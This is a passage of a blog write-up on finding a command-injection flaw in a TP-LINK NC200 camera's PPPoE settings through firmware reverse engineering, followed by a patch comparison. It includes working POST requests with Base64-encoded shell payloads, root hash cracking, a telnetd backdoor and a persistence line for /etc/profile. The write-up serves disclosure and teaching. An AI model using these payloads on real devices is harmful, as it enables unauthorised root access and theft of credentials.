fastcgi.map-extensions = ( ".html" => ".fcgi" )

fastcgi.server = ( ".fcgi" =>

(

(

"bin-path" => "/usr/local/sbin/ipcamera -d 6",

"socket" => socket_dir + "/fcgi.socket",

"max-procs" => 1,

"check-local" => "disable",

"broken-scriptfilename" => "enable",

),

)

)

# [omitted]

|

This is fairly straightforward to understand: the ipcamera binary handles every request from the web application whose path ends with .fcgi (and, through fastcgi.map-extensions, .html). Whenever the Admin updates a configuration value in the web interface, ipcamera works in the background to actually execute the task.

Hunting for low-hanging fruit

Let’s check our timer: during the two minutes that have passed, we extracted the firmware and found the binary responsible for performing the administrative tasks. What next? We could start looking for common low-hanging fruit found in embedded devices.

The first thing that comes to mind is insecure calls to system. Similar devices commonly rely on system to update their configuration. For instance, calls to system may modify a device’s IP address, hostname, DNS, and so on. Such devices also commonly pass user input to system; if that input is not sanitized, or is poorly sanitized, it is jackpot for us.



While I could use radare2 (http://www.radare.org/r) to reverse engineer the binary, I went for IDA (https://www.hex-rays.com/products/ida/) this time. Analyzing ipcamera, we can see that it indeed imports system and uses it in several places. The good surprise is that TP-LINK did not strip the symbols from their binaries. This means that we already have the names of functions such as pppoeCmdReq_core, which makes it easier to understand the code.

Figure 3: Cross-references of system in ipcamera

In the Function Name pane on the left (1), we press CTRL+F and search for system. We double-click the desired entry (2) to open its location on the IDA View tab (3). Finally, we press ‘x’ with the cursor on system (4) to show all cross-references (5).



There are many calls and no magic trick to find which are vulnerable. We need to examine them one by one. I suggest we start by analyzing those that seem to correspond to the functions we saw in the web interface. Personally, pppoeCmdReq_core caught my eye. The following web page displayed in the ipcamera’s web interface could correspond to that function.

Figure 4: NC200 web interface advanced features

So I started with the pppoeCmdReq_core call.

|

# [ omitted ]

.text:00422330 loc_422330: # CODE XREF: pppoeCmdReq_core+F8^j

.text:00422330 la $a0, 0x4E0000

.text:00422334 nop

.text:00422338 addiu $a0, (aPppd - 0x4E0000) # "pppd"

.text:0042233C li $a1, 1

.text:00422340 la $t9, cmFindSystemProc

.text:00422344 nop

.text:00422348 jalr $t9 ; cmFindSystemProc

.text:0042234C nop

.text:00422350 lw $gp, 0x210+var_1F8($fp)

# arg0 = ptr to user buffer

.text:00422354 addiu $a0, $fp, 0x210+user_input

.text:00422358 la $a1, 0x530000

.text:0042235C nop

# arg1 = formatted pppoe command

.text:00422360 addiu $a1, (pppoe_cmd - 0x530000)

.text:00422364 la $t9, pppoeFormatCmd

.text:00422368 nop

# pppoeFormatCmd(user_input, pppoe_cmd)

.text:0042236C jalr $t9 ; pppoeFormatCmd

.text:00422370 nop

.text:00422374 lw $gp, 0x210+var_1F8($fp)

.text:00422378 nop

.text:0042237C la $a0, 0x530000

.text:00422380 nop

# (2) arg0 = formatted pppoe command

.text:00422384 addiu $a0, (pppoe_cmd - 0x530000)

.text:00422388 la $t9, system

.text:0042238C nop

# (2) system(pppoe_cmd)

.text:00422390 jalr $t9 ; system

.text:00422394 nop

# [ omitted ]

|

The symbols make it easier to understand the listing; thanks again, TP-LINK. I have already renamed the buffers according to what I believe is going on:

1) pppoeFormatCmd is called with two arguments: a pointer to the user-supplied buffer, which I named user_input, and a destination buffer for the command.

2) The result from pppoeFormatCmd is passed to system. That is why I guessed that it must be the formatted PPPoE command. I pressed ‘n’ to rename the variable in IDA to pppoe_cmd.

Timer? In all, four minutes passed since the beginning. Rock on!

Let’s have a look at pppoeFormatCmd. It is a little bit big and not everything it contains is of interest. We’ll first check for the strings referenced inside the function as well as the functions being used. Following is a snippet of pppoeFormatCmd that seemed interesting:

|

# [ omitted ]

.text:004228DC addiu $a0, $fp, 0x200+clean_username

.text:004228E0 lw $a1, 0x200+user_input($fp)

.text:004228E4 la $t9, adapterShell

.text:004228E8 nop

.text:004228EC jalr $t9 ; adapterShell

.text:004228F0 nop

.text:004228F4 lw $gp, 0x200+var_1F0($fp)

.text:004228F8 addiu $v1, $fp, 0x200+clean_password

.text:004228FC lw $v0, 0x200+user_input($fp)

.text:00422900 nop

.text:00422904 addiu $v0, 0x78

# arg0 = clean_password

.text:00422908 move $a0, $v1

# arg1 = *(user_input + offset)

.text:0042290C move $a1, $v0

.text:00422910 la $t9, adapterShell

.text:00422914 nop

.text:00422918 jalr $t9 ; adapterShell

.text:0042291C nop

|

We see two consecutive calls to a function named adapterShell, which takes two parameters:

· A destination buffer (clean_username in the first call, clean_password in the second)

· A parameter to adapterShell, which is in fact the user_input from before

We have not yet looked into the function adapterShell itself. First, let’s see what is going on after these two calls:

|

.text:00422920 lw $gp, 0x200+var_1F0($fp)

.text:00422924 lw $a0, 0x200+pppoe_cmd($fp)

.text:00422928 la $t9, strlen

.text:0042292C nop

# (1) Get offset for pppoe_cmd

.text:00422930 jalr $t9 ; strlen

.text:00422934 nop

.text:00422938 lw $gp, 0x200+var_1F0($fp)

.text:0042293C move $v1, $v0

# (2) pppoe_cmd+offset

.text:00422940 lw $v0, 0x200+pppoe_cmd($fp)

.text:00422944 nop

.text:00422948 addu $v0, $v1, $v0

.text:0042294C addiu $v1, $fp, 0x200+clean_password

# (3) arg0 = *(pppoe_cmd + offset)

.text:00422950 move $a0, $v0

.text:00422954 la $a1, 0x4E0000

.text:00422958 nop

# (4) arg1 = " user \"%s\" password \"%s\" "

.text:0042295C addiu $a1, (aUserSPasswordS-0x4E0000)

# (5) arg2 = clean_username

.text:00422960 addiu $a2, $fp, 0x200+clean_username

# (6) arg3 = clean_password

.text:00422964 move $a3, $v1

.text:00422968 la $t9, sprintf

.text:0042296C nop

# (7) sprintf(pppoe_cmd, format, clean_username, clean_password)

.text:00422970 jalr $t9 ; sprintf

.text:00422974 nop

# [ omitted ]

|

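Then pppoeFormatCmd computes the current length of pppoe_cmd (1) to get the pointer to its last position (2).

From (3) to (6), it sets up the parameters for sprintf:

3) The destination, which is pppoe_cmd plus the offset computed above

4) The format string, user "%s" password "%s"

5) The clean_username string

6) The clean_password string

Finally in (7), pppoeFormatCmd actually calls sprintf.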

Based on this basic analysis, we can understand that when the Admin sets the username and password for the PPPoE configuration in the web interface, these values are formatted and passed to system.
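The flow described above can be modeled in a few lines of Python. This is only a sketch of the pattern, not the firmware’s code: the format string is the one referenced in the listing, but `format_cmd`, `run_in_shell`, and the harmless `echo pppd` prefix are stand-ins invented here (the real command prefix is not shown in the listing). It illustrates why placing user input inside double quotes is not enough when the whole string is handed to a shell.

```python
import subprocess

# Format string referenced by pppoeFormatCmd in the listing above.
PPPOE_FMT = ' user "%s" password "%s" '


def format_cmd(prefix, username, password):
    """Model of the sprintf step: append the formatted credentials to the command."""
    return prefix + PPPOE_FMT % (username, password)


def run_in_shell(cmd):
    """Model of system(cmd): the whole string is interpreted by sh -c."""
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


if __name__ == "__main__":
    # "echo pppd" is a harmless placeholder for the real command prefix.
    cmd = format_cmd("echo pppd", "$(echo injected)", "test")
    print(cmd)                # echo pppd user "$(echo injected)" password "test"
    print(run_in_shell(cmd))  # pppd user injected password test
```

The shell still performs command substitution inside double quotes, so the inner command runs before the outer one ever sees its arguments.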

Educated guess, kind of…

|

.rodata:004DDCF8 aUserSPasswordS:.ascii " user \"%s\" password \"%s\" "<0>

|

|

POST /netconf_set.fcgi HTTP/1.1

Host: 192.168.0.10

Content-Length: 277

Cookie: sess=l6x3mwr68j1jqkm

Connection: close

DhcpEnable=1&StaticIP=0.0.0.0&StaticMask=0.0.0.0&StaticGW=0.0.0.0&StaticDns0=0.0.0.0&

StaticDns1=0.0.0.0&FallbackIP=192.168.0.10&FallbackMask=255.255.255.0&PPPoeAuto=1&

PPPoeUsr=JChyZWJvb3Qp&PPPoePwd=dGVzdA%3D%3D&HttpPort=80&bonjourState=1&

token=kw8shq4v63oe04i

|
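The PPPoeUsr and PPPoePwd values in the request above are Base64 strings that have been URL-encoded on top. A small Python helper makes such captured requests readable; `decode_pppoe_fields` is a name chosen for this sketch, and the body below is a shortened excerpt of the request rather than the full form.

```python
import base64
from urllib.parse import parse_qs


def decode_pppoe_fields(form_body):
    """Return the decoded PPPoeUsr/PPPoePwd values from a URL-encoded form body."""
    fields = parse_qs(form_body)  # parse_qs also undoes the %XX URL encoding
    decoded = {}
    for name in ("PPPoeUsr", "PPPoePwd"):
        if name in fields:
            decoded[name] = base64.b64decode(fields[name][0]).decode("utf-8")
    return decoded


if __name__ == "__main__":
    # Shortened excerpt of the request body shown above.
    body = "PPPoeAuto=1&PPPoeUsr=JChyZWJvb3Qp&PPPoePwd=dGVzdA%3D%3D&HttpPort=80"
    print(decode_pppoe_fields(body))
    # {'PPPoeUsr': '$(reboot)', 'PPPoePwd': 'test'}
```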

|

depierre% ls -l _nc200_2.1.4_Build_151222_Rel.24992.bin.extracted/jffs2-root/fs_1/www

total 304

drwxr-xr-x 5 depierre staff 170 Feb 8 19:01 css/

-rw-r--r-- 1 depierre staff 1150 Feb 8 19:01 favicon.ico

-rw-r--r-- 1 depierre staff 3292 Feb 8 19:01 favicon.png

-rw-r--r-- 1 depierre staff 6647 Feb 8 19:01 guest.html

drwxr-xr-x 3 depierre staff 102 Feb 8 19:01 i18n/

drwxr-xr-x 15 depierre staff 510 Feb 8 19:01 images/

-rw-r--r-- 1 depierre staff 122931 Feb 8 19:01 index.html

drwxr-xr-x 7 depierre staff 238 Feb 8 19:01 js/

drwxr-xr-x 3 depierre staff 102 Feb 8 19:01 lib/

-rw-r--r-- 1 depierre staff 2595 Feb 8 19:01 login.html

-rw-r--r-- 1 depierre staff 741 Feb 8 19:01 update.sh

-rw-r--r-- 1 depierre staff 769 Feb 8 19:01 xupdate.sh

|

|

POST /netconf_set.fcgi HTTP/1.1

Host: 192.168.0.10

Content-Type: application/x-www-form-urlencoded;charset=utf-8

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.10/index.html

Content-Length: 301

Cookie: sess=l6x3mwr68j1jqkm

Connection: close

DhcpEnable=1&StaticIP=0.0.0.0&StaticMask=0.0.0.0&StaticGW=0.0.0.0&StaticDns0=0.0.0.0&

StaticDns1=0.0.0.0&FallbackIP=192.168.0.10&FallbackMask=255.255.255.0&PPPoeAuto=1&

PPPoeUsr=JChlY2hvIGhlbGxvID4%2BIC91c3IvbG9jYWwvd3d3L2Jhci50eHQp&

PPPoePwd=dGVzdA%3D%3D&HttpPort=80&bonjourState=1&token=zv1dn1xmbdzuoor

|

|

depierre% curl http://192.168.0.10/bar.txt

hello

|

|

POST /netconf_set.fcgi HTTP/1.1

Host: 192.168.0.10

Content-Type: application/x-www-form-urlencoded;charset=utf-8

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.10/index.html

Content-Length: 297

Cookie: sess=l6x3mwr68j1jqkm

Connection: close

DhcpEnable=1&StaticIP=0.0.0.0&StaticMask=0.0.0.0&StaticGW=0.0.0.0&

StaticDns0=0.0.0.0&StaticDns1=0.0.0.0&FallbackIP=192.168.0.10&FallbackMask=255.255.255.0

&PPPoeAuto=1&PPPoeUsr=JChpZCA%2BPiAvdXNyL2xvY2FsL3d3dy9iYXIudHh0KQ%3D%3D

&PPPoePwd=dGVzdA%3D%3D&HttpPort=80&bonjourState=1&token=zv1dn1xmbdzuoor

|

|

depierre% curl http://192.168.0.10/bar.txt

hello

|

|

POST /netconf_set.fcgi HTTP/1.1

Host: 192.168.0.10

Content-Type: application/x-www-form-urlencoded;charset=utf-8

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.10/index.html

Content-Length: 309

Cookie: sess=l6x3mwr68j1jqkm

Connection: close

DhcpEnable=1&StaticIP=0.0.0.0&StaticMask=0.0.0.0&StaticGW=0.0.0.0&StaticDns0=0.0.0.0&

StaticDns1=0.0.0.0&FallbackIP=192.168.0.10&FallbackMask=255.255.255.0&PPPoeAuto=1&

PPPoeUsr=JChjYXQgL2V0Yy9wYXNzd2QgPj4gL3Vzci9sb2NhbC93d3cvYmFyLnR4dCk%3D&

PPPoePwd=dGVzdA%3D%3D&HttpPort=80&bonjourState=1&token=zv1dn1xmbdzuoor

|

|

depierre% curl http://192.168.0.10/bar.txt

hello

root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh

|

|

depierre% cat passwd

root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh

depierre% john passwd

Loaded 1 password hash (md5crypt [MD5 32/64 X2])

Press ‘q’ or Ctrl-C to abort, almost any other key for status

root (root)

1g 0:00:00:00 100% 1/3 100.0g/s 200.0p/s 200.0c/s 200.0C/s root..rootLinux

Use the "--show" option to display all of the cracked passwords reliably

Session completed

depierre% john --show passwd

root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left

|

|

POST /netconf_set.fcgi HTTP/1.1

Host: 192.168.0.10

Content-Type: application/x-www-form-urlencoded;charset=utf-8

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.10/index.html

Content-Length: 309

Cookie: sess=l6x3mwr68j1jqkm

Connection: close

DhcpEnable=1&StaticIP=0.0.0.0&StaticMask=0.0.0.0&StaticGW=0.0.0.0&StaticDns0=0.0.0.0&

StaticDns1=0.0.0.0&FallbackIP=192.168.0.10&FallbackMask=255.255.255.0&PPPoeAuto=1&

PPPoeUsr=JCh0ZWxuZXRkKQ%3D%3D&PPPoePwd=dGVzdA%3D%3D&HttpPort=80&

bonjourState=1&token=zv1dn1xmbdzuoor

|

|

depierre% nmap -p 23 192.168.0.10

Nmap scan report for 192.168.0.10

Host is up (0.0012s latency).

PORT STATE SERVICE

23/tcp open telnet

Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds

|

|

depierre% telnet 192.168.0.10

NC200-fb04cf login: root

Password:

login: can’t chdir to home directory ‘/home/root’

BusyBox v1.12.1 (2015-11-25 10:24:27 CST) built-in shell (ash)

Enter ‘help’ for a list of built-in commands.

-rw------- 1 0 0 16 /usr/local/config/ipcamera/HwID

-r-xr-S--- 1 0 0 20 /usr/local/config/ipcamera/DevID

-rw-r----T 1 0 0 512 /usr/local/config/ipcamera/TpHeader

--wsr-S--- 1 0 0 128 /usr/local/config/ipcamera/CloudAcc

--ws------ 1 0 0 16 /usr/local/config/ipcamera/OemID

Input file: /dev/mtdblock3

Output file: /usr/local/config/ipcamera/ApMac

Offset: 0x00000004

Length: 0x00000006

This is a block device.

This is a character device.

File size: 65536

File mode: 0x61b0

======= Welcome To TL-NC200 ======

# ps | grep telnet

79 root 1896 S /usr/sbin/telnetd

4149 root 1892 S grep telnet

|

|

$(echo '/usr/sbin/telnetd -l /bin/sh' >> /etc/profile)

|
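Going the other way, from a shell payload like the one above to the value sent in the PPPoeUsr field, can be sketched as follows. The encoding order (Base64 first, then percent-encoding) is inferred from the captured requests; `encode_pppoe_value` is a hypothetical helper name, not something taken from the camera’s web interface code.

```python
import base64
from urllib.parse import quote


def encode_pppoe_value(payload):
    """Base64-encode the payload, then percent-encode the result for a form body."""
    b64 = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    return quote(b64, safe="")  # safe="" so that "+", "/" and "=" are escaped too


if __name__ == "__main__":
    print(encode_pppoe_value("$(telnetd)"))  # JCh0ZWxuZXRkKQ%3D%3D
    print(encode_pppoe_value("$(echo '/usr/sbin/telnetd -l /bin/sh' >> /etc/profile)"))
```

Only use this against devices you own or are authorized to test.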

What can we do?

|

# pwd

/usr/local/config/ipcamera

# cat cloud.conf

CLOUD_HOST=devs.tplinkcloud.com

CLOUD_SERVER_PORT=50443

CLOUD_SSL_CAFILE=/usr/local/etc/2048_newroot.cer

CLOUD_SSL_CN=*.tplinkcloud.com

CLOUD_LOCAL_IP=127.0.0.1

CLOUD_LOCAL_PORT=798

CLOUD_LOCAL_P2P_IP=127.0.0.1

CLOUD_LOCAL_P2P_PORT=929

CLOUD_HEARTBEAT_INTERVAL=60

CLOUD_ACCOUNT=albert.einstein@nulle.mc2

CLOUD_PASSWORD=GW_told_you

|

Long story short



Match and patch analysis

|

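# Simplified version. Can be inline but this is not the point here.
def adapterShell(dst_clean, src_user):
    for c in src_user:
        if c in ['\\', '"', '`']:  # Characters to escape.
            dst_clean += '\\'  # Prefix the character with a backslash.
        dst_clean += c
    return dst_clean  # Python strings are immutable, so return the result.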

|

|

depierre% radiff2 -g sym.adapterShell _NC200_2.1.5_Build_151228_Rel.25842_new.bin.extracted/jffs2-root/fs_1/sbin/ipcamera _nc200_2.1.4_Build_151222_Rel.24992.bin.extracted/jffs2-root/fs_1/sbin/ipcamera | xdot

|

|

depierre% echo "$(echo test)" # What was happening before

test

depierre% echo "\$(echo test)" # What is now happening with their patch

$(echo test)

|
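Judging from the shell session above, the patched behavior can be sketched by adding the dollar sign to the set of escaped characters. This is an assumption drawn from that output, not a transcription of the patched binary; the names `ESCAPED_BEFORE`, `ESCAPED_AFTER`, and `escape_for_double_quotes` are invented for this example.

```python
# Characters escaped by the simplified adapterShell shown earlier.
ESCAPED_BEFORE = {"\\", '"', "`"}
# Assumption: the patch additionally escapes "$".
ESCAPED_AFTER = ESCAPED_BEFORE | {"$"}


def escape_for_double_quotes(value, escaped):
    """Prefix every character found in `escaped` with a backslash."""
    out = []
    for ch in value:
        if ch in escaped:
            out.append("\\")
        out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    payload = "$(echo test)"
    print(escape_for_double_quotes(payload, ESCAPED_BEFORE))  # $(echo test)
    print(escape_for_double_quotes(payload, ESCAPED_AFTER))   # \$(echo test)
```

Escaping a deny-list of characters is fragile by design; passing arguments as a list to an exec-style call, without going through a shell, avoids the problem altogether.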

Conclusion

I hope you now understand the basic steps that you can follow when assessing the security of an embedded device. It is my personal preference to analyze the firmware whenever possible, rather than testing the web interface, mostly because less guessing is involved. You can do otherwise of course, and testing the web interface directly would have yielded the same problems.

PS: find advisory for the vulnerability here

Remotely Disabling a Wireless Burglar Alarm